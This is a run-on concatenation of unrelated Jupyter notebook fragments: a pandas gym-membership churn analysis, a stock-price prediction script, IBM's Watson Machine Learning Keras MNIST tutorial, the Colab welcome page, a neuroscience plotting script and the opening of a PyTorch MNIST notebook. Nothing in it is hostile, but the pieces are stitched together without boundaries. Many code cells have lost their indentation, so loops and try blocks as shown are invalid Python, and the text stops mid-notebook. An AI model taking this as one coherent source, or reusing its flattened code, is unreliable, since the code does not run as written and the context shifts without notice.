## 2. Processing Customer Data
```
customer_join = pd.merge(customer, class_master, on='class', how='left')
customer_join = pd.merge(customer_join, campaign_master, on='campaign_id', how='left')
customer_join.head()
customer_join.isnull().sum()
```
## 3. Aggregating Customer Data
```
customer_join.groupby('class_name').count()['customer_id']
customer_join.groupby('campaign_name').count()['customer_id']
customer_join.groupby('gender').count()['customer_id']
customer_join.groupby('is_deleted').count()['customer_id'] # 1 : withdrawn
customer_join['start_date'] = pd.to_datetime(customer_join['start_date'])
customer_start = customer_join.loc[customer_join['start_date'] > pd.to_datetime('20180401')]
print(len(customer_start))
```
## 4. Aggregating the Latest Customer Data
* Extract only customers from the most recent month
```
customer_join['end_date'] = pd.to_datetime(customer_join['end_date'])
customer_newer = customer_join.loc[(customer_join['end_date'] >= pd.to_datetime('20190331')) | \
(customer_join['end_date'].isna())]
print(len(customer_newer))
customer_newer['end_date'].unique()
customer_newer.groupby('class_name').count()['customer_id']
customer_newer.groupby('campaign_name').count()['customer_id']
customer_newer.groupby('gender').count()['customer_id']
```
## 5. Aggregating Usage History Data
* Add the mean, median, maximum, and minimum of monthly usage counts, plus a regular-use flag, to the customer data
```
uselog['usedate'] = pd.to_datetime(uselog['usedate'])
uselog['연월'] = uselog['usedate'].dt.strftime('%Y%m')
uselog_months = uselog.groupby(['연월', 'customer_id'], as_index=False).count()
uselog_months.rename(columns={'log_id':'count'}, inplace=True)
del uselog_months['usedate']
uselog_months.head()
uselog_customer = uselog_months.groupby('customer_id').agg(['mean', 'median', 'max', 'min'])['count']
uselog_customer = uselog_customer.reset_index(drop=False)
uselog_customer.head()
```
## 6. Checking Regular Use from the Usage History
* For each customer, aggregate counts by month and weekday; the flag is 1 if any weekday has a maximum count of 4 or more
```
uselog['weekday'] = uselog['usedate'].dt.weekday # 0 ~ 6 : Monday ~ Sunday
uselog_weekday = uselog.groupby(['customer_id', '연월', 'weekday'], as_index=False).count()[['customer_id',
'연월', 'weekday', 'log_id']]
uselog_weekday.rename(columns={'log_id':'count'}, inplace=True)
uselog_weekday.head()
uselog_weekday = uselog_weekday.groupby('customer_id', as_index=False).max()[['customer_id', 'count']]
uselog_weekday['routine_flg'] = 0
uselog_weekday['routine_flg'] = uselog_weekday['routine_flg'].where(uselog_weekday['count']<4, 1)
uselog_weekday.head()
```
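`Series.where(cond, other)` keeps the existing values where the condition holds and substitutes `other` elsewhere, so the line above writes 1 exactly where `count >= 4`. A minimal check in isolation:

```python
import pandas as pd

counts = pd.Series([1, 3, 4, 6])
flag = pd.Series(0, index=counts.index)

# where(cond, other) keeps 0 where counts < 4 and substitutes 1
# elsewhere, matching the routine_flg logic above.
flag = flag.where(counts < 4, 1)
print(flag.tolist())  # [0, 0, 1, 1]
```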
## 7. Joining Customer Data with Usage History Data
```
customer_join = pd.merge(customer_join, uselog_customer, on='customer_id', how='left')
customer_join = pd.merge(customer_join, uselog_weekday[['customer_id', 'routine_flg']], on='customer_id', how='left')
customer_join.head()
customer_join.isnull().sum()
```
## 8. Calculating the Membership Period
* Basic calculation: the difference between start_date and end_date
* Members who have not withdrawn have a missing end_date, so it is arbitrarily set to April 30, 2019 to distinguish them from members who withdrew on March 31.
```
from dateutil.relativedelta import relativedelta
customer_join['calc_date'] = customer_join['end_date']
customer_join['calc_date'] = customer_join['calc_date'].fillna(pd.to_datetime('20190430'))
membership_periods = []
for i in range(len(customer_join)):
    delta = relativedelta(customer_join['calc_date'].iloc[i], customer_join['start_date'].iloc[i])
    membership_periods.append(delta.years*12 + delta.months)
customer_join['membership_period'] = membership_periods
customer_join.head()
```
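`relativedelta` returns calendar-aware year and month components, and `years*12 + months` converts them to the whole-month count used for `membership_period` above. For example (with made-up dates):

```python
from datetime import datetime
from dateutil.relativedelta import relativedelta

start = datetime(2018, 4, 15)
end = datetime(2019, 7, 15)

# 1 year and 3 months -> 15 whole months, the same formula as above.
delta = relativedelta(end, start)
print(delta.years * 12 + delta.months)  # 15
```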
## 9. Examining Summary Statistics
```
customer_join[['mean', 'median', 'max', 'min']].describe()
customer_join.groupby('routine_flg').count()['customer_id']
import matplotlib.pyplot as plt
%matplotlib inline
plt.hist(customer_join['membership_period'])
```
## 10. Comparing Withdrawn and Continuing Members
```
customer_end = customer_join.loc[customer_join['is_deleted']==1]
customer_end.describe()
customer_stay = customer_join.loc[customer_join['is_deleted']==0]
customer_stay.describe()
```
```
from database.market import Market
from database.strategy import Strategy
from extractor.tiingo_extractor import TiingoExtractor
from preprocessor.model_preprocessor import ModelPreprocessor
from preprocessor.predictor_preprocessor import PredictorPreprocessor
from modeler.modeler import Modeler
from datetime import datetime, timedelta
from tqdm import tqdm
import pandas as pd
import pickle
import tensorflow as tf
import warnings
warnings.simplefilter(action='ignore', category=Warning)
from modeler.modeler import Modeler
market = Market()
strat= Strategy("aggregate")
## Loading Constants
market.connect()
tickers = market.retrieve_data("sp500")
market.close()
years = 10
end = datetime.now()
start = datetime.now() - timedelta(days=365.25*years)
market.connect()
test = market.retrieve_data("dataset_regression")
market.close()
test
ticker = "AAPL"
m = Modeler(ticker)
data = test.copy()
data["y"] = data[ticker]
features = data.drop(["date","y","_id"],axis=1)
for column in tqdm(features.columns):
for i in range(14):
features["ticker_{}_{}".format(column,i)] = features[column].shift(i)
features = features[14:]
for i in range(14):
data["y_{}".format(i)] = data["y"].shift(i)
data = data[14:]
new_labels = []
for i in range(len(data["y"])):
row = data.iloc[i]
new_labels.append(row[[x for x in data.columns if "y_" in x]].values)
# new = []
# for column in tqdm([x for x in features.columns if "_" not in x]):
# new_row = []
# for i in range(1,360):
# row = features.iloc[i]
# new_row.append(row[[x for x in features.columns if ("ticker_" + column + "_") in x]].values)
# new.append(new_row)
features
predictions = []
for i in tqdm(range(14)):
results = pd.DataFrame(m.sk_model({"X":features[i:],"y":data["y"].shift(i)[i:]}))
prediction = results.sort_values("score",ascending=False).iloc[0]["model"].predict(features[-14:])
predictions.append(prediction[len(prediction)-1])
import matplotlib.pyplot as plt
stuff = data[-14:]
stuff["predict"] = predictions
plt.plot(stuff["y"])
plt.plot(stuff["predict"])
plt.show()
features[-14:]
stuff
m = tf.keras.models.Sequential([
tf.keras.layers.Dense(units=64,activation="relu"),
tf.keras.layers.Dense(units=64,activation="relu"),
tf.keras.layers.Dense(units=1)
])
m.compile(loss=tf.losses.MeanSquaredError(),metrics=[tf.metrics.mean_squared_error])
predictions = []
for i in range(14):
m.fit(tf.stack(features[i:]),tf.stack(data["y"].shift(i)[i:]))
prediction = m.predict(tf.stack(features))
predictions.append(prediction[0])
import matplotlib.pyplot as plt
stuff = data[-14:]
stuff["predict"] = predictions
plt.plot(stuff["y"])
plt.plot(stuff["predict"])
plt.show()
days = 100
end = datetime(2020,7,1)
start = end - timedelta(days=days)
base = pd.date_range(start,end)
gap = 2
rows = []
training_days = 100
strat.connect()
for date in tqdm(base):
if date.weekday() < 5:
training_start = date - timedelta(days=training_days)
training_end = date
if date.weekday() == 4:
prediction_date = date + timedelta(days=3)
else:
prediction_date = date + timedelta(days=1)
classification = strat.retrieve_training_data("dataset_classification",training_start,prediction_date)
classification_prediction = pd.DataFrame([classification.drop(["Date","_id"],axis=1).iloc[len(classification["Date"])-1]])
if len(classification) > 60 and len(classification_prediction) > 0:
for i in range(46,47):
try:
ticker = tickers.iloc[i]["Symbol"]
if ticker in classification.columns:
sector = tickers.iloc[i]["GICS Sector"]
sub_sector = tickers.iloc[i]["GICS Sub Industry"]
cik = int(tickers.iloc[i]["CIK"].item())
classification_data = classification.copy()
classification_data["y"] = classification_data[ticker]
classification_data["y"] = classification_data["y"].shift(-gap)
classification_data = classification_data[:-gap]
mt = ModelPreprocessor(ticker)
rc = mt.day_trade_preprocess_classify(classification_data.copy(),ticker)
sp = Modeler(ticker)
results_rc = sp.classify_tf(rc)
results = pd.DataFrame([results_rc])
model = results.sort_values("accuracy",ascending=False).iloc[0]
m = model["model"]
mr = PredictorPreprocessor(ticker)
refined = mr.preprocess_classify(classification_prediction.copy())
cleaned = classification_prediction
factors = refined["X"]
prediction = [x[0] for x in m.predict(factors)]
product = market.retrieve_price_data("prices",ticker)
product["Date"] = [datetime.strptime(x,"%Y-%m-%d") for x in product["Date"]]
product = product[(product["Date"] > training_end) & (product["Date"] <= prediction_date)]
product["predicted"] = prediction
product["predicted"] = [1 if x > 0 else 0 for x in product["predicted"]]
product["accuracy"] = model["accuracy"]
product.sort_values("Date",inplace=True)
product = product[["Date","Adj_Close","predicted","accuracy","ticker"]].dropna()
strat.store_data("sim_tf",product)
except Exception as e:
print(str(e))
strat.close()
```
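The lag-feature construction in the cells above follows the standard pandas `shift` pattern. Isolated, with a hypothetical `price` column:

```python
import pandas as pd

frame = pd.DataFrame({"price": [10, 11, 12, 13, 14]})

# Each lag column i holds the value from i rows earlier, as in the
# feature loop above; the leading rows with NaNs are then dropped.
for i in range(1, 3):
    frame["price_lag_{}".format(i)] = frame["price"].shift(i)
frame = frame.dropna()
print(frame.shape)  # (3, 3)
```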
# Use Keras to recognize hand-written digits with `ibm-watson-machine-learning`
This notebook uses the Keras machine learning framework with the Watson Machine Learning service. It contains steps and code to work with [ibm-watson-machine-learning](https://pypi.python.org/pypi/ibm-watson-machine-learning) library available in PyPI repository. It also introduces commands for getting model and training data, persisting model, deploying model and scoring it.
Some familiarity with Python is helpful. This notebook uses Python 3.8.
## Learning goals
The learning goals of this notebook are:
- Download an externally trained Keras model with dataset.
- Persist an external model in Watson Machine Learning repository.
- Deploy model for online scoring using client library.
- Score sample records using client library.
## Contents
This notebook contains the following parts:
1. [Setup](#setup)
2. [Download externally created Keras model and data](#download)
3. [Persist externally created Keras model](#upload)
4. [Deploy and score in a Cloud](#deploy)
5. [Clean up](#cleanup)
6. [Summary and next steps](#summary)
<a id="setup"></a>
## 1. Set up the environment
Before you use the sample code in this notebook, you must perform the following setup tasks:
- Create a <a href="https://console.ng.bluemix.net/catalog/services/ibm-watson-machine-learning/" target="_blank" rel="noopener no referrer">Watson Machine Learning (WML) Service</a> instance (a free plan is offered and information about how to create the instance can be found <a href="https://dataplatform.cloud.ibm.com/docs/content/wsj/analyze-data/ml-service-instance.html?context=analytics" target="_blank" rel="noopener no referrer">here</a>).
### Connection to WML
Authenticate the Watson Machine Learning service on IBM Cloud. You need to provide platform `api_key` and instance `location`.
You can use [IBM Cloud CLI](https://cloud.ibm.com/docs/cli/index.html) to retrieve platform API Key and instance location.
API Key can be generated in the following way:
```
ibmcloud login
ibmcloud iam api-key-create API_KEY_NAME
```
From the output, note the value of `api_key`.
Location of your WML instance can be retrieved in the following way:
```
ibmcloud login --apikey API_KEY -a https://cloud.ibm.com
ibmcloud resource service-instance WML_INSTANCE_NAME
```
From the output, note the value of `location`.
**Tip**: Your `Cloud API key` can be generated by going to the [**Users** section of the Cloud console](https://cloud.ibm.com/iam#/users). From that page, click your name, scroll down to the **API Keys** section, and click **Create an IBM Cloud API key**. Give your key a name and click **Create**, then copy the created key and paste it below. You can also get a service specific url by going to the [**Endpoint URLs** section of the Watson Machine Learning docs](https://cloud.ibm.com/apidocs/machine-learning). You can check your instance location in your <a href="https://console.ng.bluemix.net/catalog/services/ibm-watson-machine-learning/" target="_blank" rel="noopener no referrer">Watson Machine Learning (WML) Service</a> instance details.
You can also get service specific apikey by going to the [**Service IDs** section of the Cloud Console](https://cloud.ibm.com/iam/serviceids). From that page, click **Create**, then copy the created key and paste it below.
**Action**: Enter your `api_key` and `location` in the following cell.
```
api_key = 'PASTE YOUR PLATFORM API KEY HERE'
location = 'PASTE YOUR INSTANCE LOCATION HERE'
wml_credentials = {
"apikey": api_key,
"url": 'https://' + location + '.ml.cloud.ibm.com'
}
```
### Install and import the `ibm-watson-machine-learning` package
**Note:** `ibm-watson-machine-learning` documentation can be found <a href="http://ibm-wml-api-pyclient.mybluemix.net/" target="_blank" rel="noopener no referrer">here</a>.
```
!pip install -U ibm-watson-machine-learning
from ibm_watson_machine_learning import APIClient
client = APIClient(wml_credentials)
```
### Working with spaces
First of all, you need to create a space that will be used for your work. If you do not have a space already created, you can use [Deployment Spaces Dashboard](https://dataplatform.cloud.ibm.com/ml-runtime/spaces?context=cpdaas) to create one.
- Click New Deployment Space
- Create an empty space
- Select Cloud Object Storage
- Select Watson Machine Learning instance and press Create
- Copy `space_id` and paste it below
**Tip**: You can also use SDK to prepare the space for your work. More information can be found [here](https://github.com/IBM/watson-machine-learning-samples/blob/master/cloud/notebooks/python_sdk/instance-management/Space%20management.ipynb).
**Action**: Assign space ID below
```
space_id = 'PASTE YOUR SPACE ID HERE'
```
You can use `list` method to print all existing spaces.
```
client.spaces.list(limit=10)
```
To be able to interact with all resources available in Watson Machine Learning, you need to set **space** which you will be using.
```
client.set.default_space(space_id)
```
<a id="download"></a>
## 2. Download externally created Keras model and data
In this section, you will download externally created Keras models and data used for training it.
```
import os
import wget
data_dir = 'MNIST_DATA'
if not os.path.isdir(data_dir):
os.mkdir(data_dir)
model_path = os.path.join(data_dir, 'mnist_keras.h5.tgz')
if not os.path.isfile(model_path):
wget.download("https://github.com/IBM/watson-machine-learning-samples/raw/master/cloud/models/keras/mnist_keras.h5.tgz", out=data_dir)
import os
import wget
data_dir = 'MNIST_DATA'
if not os.path.isdir(data_dir):
os.mkdir(data_dir)
filename = os.path.join(data_dir, 'mnist.npz')
if not os.path.isfile(filename):
wget.download('https://s3.amazonaws.com/img-datasets/mnist.npz', out=data_dir)
import numpy as np
dataset = np.load(filename)
x_test = dataset['x_test']
```
<a id="upload"></a>
## 3. Persist externally created Keras model
In this section, you will learn how to store your model in Watson Machine Learning repository by using the Watson Machine Learning Client.
### 3.1: Publish model
#### Publish model in Watson Machine Learning repository on Cloud.
Define model name, type and software specification needed to deploy model later.
```
software_spec_uid = client.software_specifications.get_id_by_name("default_py3.8")
metadata = {
    client.repository.ModelMetaNames.NAME: 'External Keras model',
    client.repository.ModelMetaNames.TYPE: 'tensorflow_2.4',
    client.repository.ModelMetaNames.SOFTWARE_SPEC_UID: software_spec_uid
}
published_model = client.repository.store_model(
model=model_path,
meta_props=metadata)
```
### 3.2: Get model details
```
import json
published_model_uid = client.repository.get_model_uid(published_model)
model_details = client.repository.get_details(published_model_uid)
print(json.dumps(model_details, indent=2))
```
### 3.3 Get all models
```
models_details = client.repository.list_models()
```
<a id="deploy"></a>
## 4. Deploy and score in a Cloud
In this section you will learn how to create online scoring and to score a new data record by using the Watson Machine Learning Client.
### 4.1: Create model deployment
#### Create online deployment for published model
```
metadata = {
client.deployments.ConfigurationMetaNames.NAME: "Deployment of external Keras model",
client.deployments.ConfigurationMetaNames.ONLINE: {}
}
created_deployment = client.deployments.create(published_model_uid, meta_props=metadata)
```
**Note**: Here we use the deployment URL saved in the `published_model` object. In the next section, we show how to retrieve the deployment URL from the Watson Machine Learning instance.
```
deployment_uid = client.deployments.get_uid(created_deployment)
```
Now you can print an online scoring endpoint.
```
scoring_endpoint = client.deployments.get_scoring_href(created_deployment)
print(scoring_endpoint)
```
You can also list existing deployments.
```
client.deployments.list()
```
### 4.2: Get deployment details
```
client.deployments.get_details(deployment_uid)
```
<a id="score"></a>
### 4.3: Score
You can use the method below to send a test scoring request against the deployed model.
Let's first visualize the two samples from the dataset that we'll use for scoring.
```
%matplotlib inline
import matplotlib.pyplot as plt
for i, image in enumerate([x_test[0], x_test[1]]):
plt.subplot(2, 2, i + 1)
plt.axis('off')
plt.imshow(image, cmap=plt.cm.gray_r, interpolation='nearest')
```
Prepare scoring payload with records to score.
```
score_0 = (x_test[0].ravel() / 255).tolist()
score_1 = (x_test[1].ravel() / 255).tolist()
scoring_payload = {"input_data": [{"values": [score_0, score_1]}]}
```
Use the ``client.deployments.score()`` method to run scoring.
```
predictions = client.deployments.score(deployment_uid, scoring_payload)
print(json.dumps(predictions, indent=2))
```
<a id="cleanup"></a>
## 5. Clean up
If you want to clean up all created assets:
- experiments
- trainings
- pipelines
- model definitions
- models
- functions
- deployments
please follow this sample [notebook](https://github.com/IBM/watson-machine-learning-samples/blob/master/cloud/notebooks/python_sdk/instance-management/Machine%20Learning%20artifacts%20management.ipynb).
<a id="summary"></a>
## 6. Summary and next steps
You successfully completed this notebook! You learned how to use Keras machine learning library as well as Watson Machine Learning for model creation and deployment. Check out our _[Online Documentation](https://dataplatform.cloud.ibm.com/docs/content/wsj/getting-started/welcome-main.html?context=analytics?pos=2)_ for more samples, tutorials, documentation, how-tos, and blog posts.
### Authors
**Daniel Ryszka**, Software Engineer
Copyright © 2020, 2021 IBM. This notebook and its source code are released under the terms of the MIT License.
<a href="https://colab.research.google.com/github/katie-chiang/ARMultiDoodle/blob/master/Copy_of_Welcome_To_Colaboratory.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
<p><img alt="Colaboratory logo" height="45px" src="/img/colab_favicon.ico" align="left" hspace="10px" vspace="0px"></p>
<h1>What is Colaboratory?</h1>
Colaboratory, or "Colab" for short, allows you to write and execute Python in your browser, with
- Zero configuration required
- Free access to GPUs
- Easy sharing
Whether you're a **student**, a **data scientist** or an **AI researcher**, Colab can make your work easier. Watch [Introduction to Colab](https://www.youtube.com/watch?v=inN8seMm7UI) to learn more, or just get started below!
## **Getting started**
The document you are reading is not a static web page, but an interactive environment called a **Colab notebook** that lets you write and execute code.
For example, here is a **code cell** with a short Python script that computes a value, stores it in a variable, and prints the result:
```
seconds_in_a_day = 24 * 60 * 60
seconds_in_a_day
```
To execute the code in the above cell, select it with a click and then either press the play button to the left of the code, or use the keyboard shortcut "Command/Ctrl+Enter". To edit the code, just click the cell and start editing.
Variables that you define in one cell can later be used in other cells:
```
seconds_in_a_week = 7 * seconds_in_a_day
seconds_in_a_week
```
Colab notebooks allow you to combine **executable code** and **rich text** in a single document, along with **images**, **HTML**, **LaTeX** and more. When you create your own Colab notebooks, they are stored in your Google Drive account. You can easily share your Colab notebooks with co-workers or friends, allowing them to comment on your notebooks or even edit them. To learn more, see [Overview of Colab](/notebooks/basic_features_overview.ipynb). To create a new Colab notebook you can use the File menu above, or use the following link: [create a new Colab notebook](http://colab.research.google.com#create=true).
Colab notebooks are Jupyter notebooks that are hosted by Colab. To learn more about the Jupyter project, see [jupyter.org](https://www.jupyter.org).
## Data science
With Colab you can harness the full power of popular Python libraries to analyze and visualize data. The code cell below uses **numpy** to generate some random data, and uses **matplotlib** to visualize it. To edit the code, just click the cell and start editing.
```
import numpy as np
from matplotlib import pyplot as plt
ys = 200 + np.random.randn(100)
x = [x for x in range(len(ys))]
plt.plot(x, ys, '-')
plt.fill_between(x, ys, 195, where=(ys > 195), facecolor='g', alpha=0.6)
plt.title("Sample Visualization")
plt.show()
```
You can import your own data into Colab notebooks from your Google Drive account, including from spreadsheets, as well as from Github and many other sources. To learn more about importing data, and how Colab can be used for data science, see the links below under [Working with Data](#working-with-data).
## Machine learning
With Colab you can import an image dataset, train an image classifier on it, and evaluate the model, all in just [a few lines of code](https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/quickstart/beginner.ipynb). Colab notebooks execute code on Google's cloud servers, meaning you can leverage the power of Google hardware, including [GPUs and TPUs](#using-accelerated-hardware), regardless of the power of your machine. All you need is a browser.
Colab is used extensively in the machine learning community with applications including:
- Getting started with TensorFlow
- Developing and training neural networks
- Experimenting with TPUs
- Disseminating AI research
- Creating tutorials
To see sample Colab notebooks that demonstrate machine learning applications, see the [machine learning examples](#machine-learning-examples) below.
## More Resources
### Working with Notebooks in Colab
- [Overview of Colaboratory](/notebooks/basic_features_overview.ipynb)
- [Guide to Markdown](/notebooks/markdown_guide.ipynb)
- [Importing libraries and installing dependencies](/notebooks/snippets/importing_libraries.ipynb)
- [Saving and loading notebooks in GitHub](https://colab.research.google.com/github/googlecolab/colabtools/blob/master/notebooks/colab-github-demo.ipynb)
- [Interactive forms](/notebooks/forms.ipynb)
- [Interactive widgets](/notebooks/widgets.ipynb)
- <img src="/img/new.png" height="20px" align="left" hspace="4px" alt="New"></img>
[TensorFlow 2 in Colab](/notebooks/tensorflow_version.ipynb)
<a name="working-with-data"></a>
### Working with Data
- [Loading data: Drive, Sheets, and Google Cloud Storage](/notebooks/io.ipynb)
- [Charts: visualizing data](/notebooks/charts.ipynb)
- [Getting started with BigQuery](/notebooks/bigquery.ipynb)
### Machine Learning Crash Course
These are a few of the notebooks from Google's online Machine Learning course. See the [full course website](https://developers.google.com/machine-learning/crash-course/) for more.
- [Intro to Pandas](/notebooks/mlcc/intro_to_pandas.ipynb)
- [Tensorflow concepts](/notebooks/mlcc/tensorflow_programming_concepts.ipynb)
- [First steps with TensorFlow](/notebooks/mlcc/first_steps_with_tensor_flow.ipynb)
- [Intro to neural nets](/notebooks/mlcc/intro_to_neural_nets.ipynb)
- [Intro to sparse data and embeddings](/notebooks/mlcc/intro_to_sparse_data_and_embeddings.ipynb)
<a name="using-accelerated-hardware"></a>
### Using Accelerated Hardware
- [TensorFlow with GPUs](/notebooks/gpu.ipynb)
- [TensorFlow with TPUs](/notebooks/tpu.ipynb)
<a name="machine-learning-examples"></a>
## Machine Learning Examples
To see end-to-end examples of the interactive machine learning analyses that Colaboratory makes possible, check out these tutorials using models from [TensorFlow Hub](https://tfhub.dev).
A few featured examples:
- [Retraining an Image Classifier](https://tensorflow.org/hub/tutorials/tf2_image_retraining): Build a Keras model on top of a pre-trained image classifier to distinguish flowers.
- [Text Classification](https://tensorflow.org/hub/tutorials/tf2_text_classification): Classify IMDB movie reviews as either *positive* or *negative*.
- [Style Transfer](https://tensorflow.org/hub/tutorials/tf2_arbitrary_image_stylization): Use deep learning to transfer style between images.
- [Multilingual Universal Sentence Encoder Q&A](https://tensorflow.org/hub/tutorials/retrieval_with_tf_hub_universal_encoder_qa): Use a machine learning model to answer questions from the SQuAD dataset.
- [Video Interpolation](https://tensorflow.org/hub/tutorials/tweening_conv3d): Predict what happened in a video between the first and the last frame.
```
import random
import copy
import logging
import sys
from run_tests_201204 import *
import os
import sys
import importlib
from collections import defaultdict
sys.path.insert(0, '/n/groups/htem/Segmentation/shared-nondev/cb2_segmentation/analysis_mf_grc')
from tools_pattern import get_eucledean_dist
import compress_pickle
import my_plot
from my_plot import MyPlotData, my_box_plot
import seaborn as sns
script_n = 'plot_210413_across_masked_noise'
data_script = 'batch_210414_across_masked_noise'
db_path = '/n/groups/htem/Segmentation/shared-nondev/cb2_segmentation/analysis_mf_grc/dimensionality_sim/' \
f'{data_script}/'
scaled_noise = 1
core_noise = 0
n_mfs = 400
n_grcs = 2400
signal_ratio = .5
signal_type = 'random'
db = {}
model = 'scaleup4'
db[model] = compress_pickle.load(
db_path+f'{data_script}_{model}_{n_grcs}_{n_mfs}_signal_ratio_{signal_ratio}_signal_type_{signal_type}_0.3_512_10.gz')
model = 'random'
db[model] = compress_pickle.load(
db_path+f'{data_script}_{model}_{n_grcs}_{n_mfs}_signal_ratio_{signal_ratio}_signal_type_{signal_type}_0.3_512_10.gz')
model = 'naive_random4'
db[model] = compress_pickle.load(
db_path+f'{data_script}_{model}_{n_grcs}_{n_mfs}_signal_ratio_{signal_ratio}_signal_type_{signal_type}_0.3_512_10.gz')
avg_grc_dim_list = defaultdict(list)
for ress in db['random']:
ress_tries = ress
for ress in ress_tries:
# print(ress)
for noise in ress:
res = ress[noise]
grc_dim = res['grc_dim']
avg_grc_dim_list[noise].append(grc_dim)
avg_grc_dim = {}
for noise in avg_grc_dim_list:
avg_grc_dim[noise] = sum(avg_grc_dim_list[noise])/len(avg_grc_dim_list[noise])
avg_grc_dim_list = defaultdict(list)
for ress in db['naive_random4']:
ress_tries = ress
for ress in ress_tries:
# print(ress)
for noise in ress:
res = ress[noise]
grc_dim = res['grc_dim']
avg_grc_dim_list[noise].append(grc_dim)
avg_grc_dim2 = {}
for noise in avg_grc_dim_list:
avg_grc_dim2[noise] = sum(avg_grc_dim_list[noise])/len(avg_grc_dim_list[noise])
name_map = {
'scaleup4': "Observed",
'global_random': "Global Random",
'random': "Global Random",
# 'naive_random_17': "Local Random",
'naive_random4': "Local Random",
}
palette = {
name_map['scaleup4']: sns.color_palette()[0],
name_map['global_random']: sns.color_palette()[1],
name_map['random']: sns.color_palette()[1],
name_map['naive_random4']: sns.color_palette()[2],
# name_map['naive_random_21']: sns.color_palette()[2],
}
mpd = MyPlotData()
ress_ref = db['naive_random4'][0][0]
resss_ref2 = db['naive_random4'][0]
for model_name in [
# 'global_random',
# 'naive_random_17',
'random',
'naive_random4',
'scaleup4',
]:
ress = db[model_name]
# print(ress)
ress_tries = ress[0] # get the first element in tuple
# ress = ress[0] # get the first try
for n_try, ress in enumerate(ress_tries):
# print(resss_ref2[0])
# print(resss_ref2.keys())
if n_try >= len(resss_ref2):
print(n_try)
continue
ress_ref2 = resss_ref2[n_try]
for noise in ress:
# print(noise)
res = ress[noise]
# res_ref = ress_ref[noise]
res_ref2 = ress_ref2[noise]
# hamming_distance_norm = res['hamming_distance']/res['num_grcs']
mpd.add_data_point(
model=name_map[model_name],
noise=noise*100,
grc_dim=res['grc_dim'],
grc_dim_norm=res['grc_dim']/res_ref2['grc_dim'],
grc_dim_norm2=res['grc_dim']/avg_grc_dim[noise],
grc_dim_norm3=res['grc_dim']/avg_grc_dim2[noise],
grc_by_mf_dim=res['grc_dim']/res['mf_dim'],
# grc_by_mf_dim_ref=res['grc_dim']/res_ref['mf_dim'],
num_grcs=res['num_grcs'],
num_mfs=res['num_mfs'],
voi=res['voi'],
grc_pop_corr=res['grc_pop_corr'],
grc_pop_corr_norm=res['grc_pop_corr']/res_ref2['grc_pop_corr'],
binary_similarity=res['binary_similarity'],
hamming_distance=res['hamming_distance'],
normalized_mse=res['normalized_mse'],
)
# importlib.reload(my_plot); my_plot.my_relplot(
# mpd,
# x='noise',
# y='grc_dim',
# hue='model',
# context='paper',
# palette=palette,
# linewidth=1,
# log_scale_y=True,
# width=10,
# # ylim=[0, None],
# y_axis_label='Dim. Expansion ($x$)',
# x_axis_label='MF Input Variation (%)',
# title='noise',
# save_filename=f'{script_n}_act_30.svg',
# show=True,
# )
importlib.reload(my_plot); my_plot.my_relplot(
mpd,
x='noise',
y='grc_dim',
hue='model',
context='paper',
palette=palette,
linewidth=1,
# log_scale_y=True,
width=10,
# ylim=[.9, 1.1],
y_axis_label='Dim. Expansion ($x$)',
x_axis_label='MF Input Variation (%)',
title='noise',
save_filename=f'{script_n}.svg',
show=True,
)
importlib.reload(my_plot); my_plot.my_relplot(
mpd,
x='noise',
y='grc_dim_norm2',
hue='model',
context='paper',
palette=palette,
linewidth=2,
# log_scale_y=True,
# ci='sd',
ci=68,
width=3.5,
height=2.5,
ylim=[0, 1.05],
y_axis_label='Rel. Noise ($x$)',
x_axis_label='Stochastic Noise (%)',
# title='noise',
save_filename=f'{script_n}_rel_noise_reduction.svg',
show=True,
)
importlib.reload(my_plot); my_plot.my_relplot(
mpd,
x='noise',
y='grc_dim_norm3',
hue='model',
context='paper',
palette=palette,
linewidth=2,
# log_scale_y=True,
# ci='sd',
ci=68,
width=3.5,
height=2.5,
ylim=[.5, 1.8],
y_axis_label='Rel. Noise ($x$)',
x_axis_label='Stochastic Noise (%)',
# title='noise',
save_filename=f'{script_n}_rel_noise_reduction2.svg',
show=True,
)
importlib.reload(my_plot); my_plot.my_relplot(
mpd,
x='noise',
y='grc_pop_corr_norm',
hue='model',
context='paper',
palette=palette,
linewidth=2,
# log_scale_y=True,
# ci='sd',
ci=68,
width=3.5,
height=2.5,
# ylim=[0, 1.05],
y_axis_label='Rel. Noise ($x$)',
x_axis_label='Stochastic Noise (%)',
# title='noise',
save_filename=f'{script_n}_popcorr.svg',
show=True,
)
importlib.reload(my_plot); my_plot.my_relplot(
mpd,
x='noise',
y='grc_dim',
hue='model',
context='paper',
palette=palette,
linewidth=2,
# log_scale_y=True,
# ci='sd',
ci=68,
width=3.5,
height=2.5,
# ylim=[0, 1.05],
y_axis_label='Noise ($x$)',
x_axis_label='Stochastic Noise (%)',
# title='noise',
save_filename=f'{script_n}_noise_reduction.svg',
show=True,
)
importlib.reload(my_plot); my_plot.my_relplot(
mpd,
x='noise',
y='grc_by_mf_dim',
hue='model',
context='paper',
palette=palette,
linewidth=2,
# log_scale_y=True,
# ci='sd',
# ci=68,
width=3.5,
height=3,
# ylim=[.9, 1.1],
y_axis_label='Dim. Expansion ($x$)',
x_axis_label='Graded Variation (%)',
# title='noise',
save_filename=f'{script_n}_dim_expansion.svg',
show=True,
)
```
<a href="https://colab.research.google.com/github/RoisulIslamRumi/MNIST-PyTorch/blob/main/MNist_with_Pytorch.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
# Import required libraries
import torch        # core modules for building neural networks
import torchvision  # to preprocess and transform the data
import torch.nn as nn
from torchvision import datasets, transforms
import matplotlib.pyplot as plt
from torch import optim
import numpy as np
%matplotlib inline
```
Normalize does the following for each channel:
**image = (image - mean) / std**
The parameters **mean** and **std** are both passed as 0.5, which normalizes the image into the range [-1, 1]. For example, the minimum value 0 is converted to (0 - 0.5)/0.5 = -1, and the maximum value 1 is converted to (1 - 0.5)/0.5 = 1.
To get your image back into the [0, 1] range, the equation would be:
**image = (image * std) + mean**
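This round trip can be sketched with plain arithmetic (pure Python here, standing in for the per-channel tensor operation that `transforms.Normalize` performs):

```python
mean, std = 0.5, 0.5

# Pixel values after ToTensor(), i.e. already scaled into [0, 1]
pixels = [0.0, 0.5, 1.0]

# Forward: (image - mean) / std maps [0, 1] onto [-1, 1]
normalized = [(p - mean) / std for p in pixels]    # [-1.0, 0.0, 1.0]

# Inverse: (image * std) + mean recovers the original range
recovered = [(n * std) + mean for n in normalized]  # [0.0, 0.5, 1.0]

print(normalized, recovered)
```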
```
mean = 0.5
std = 0.5
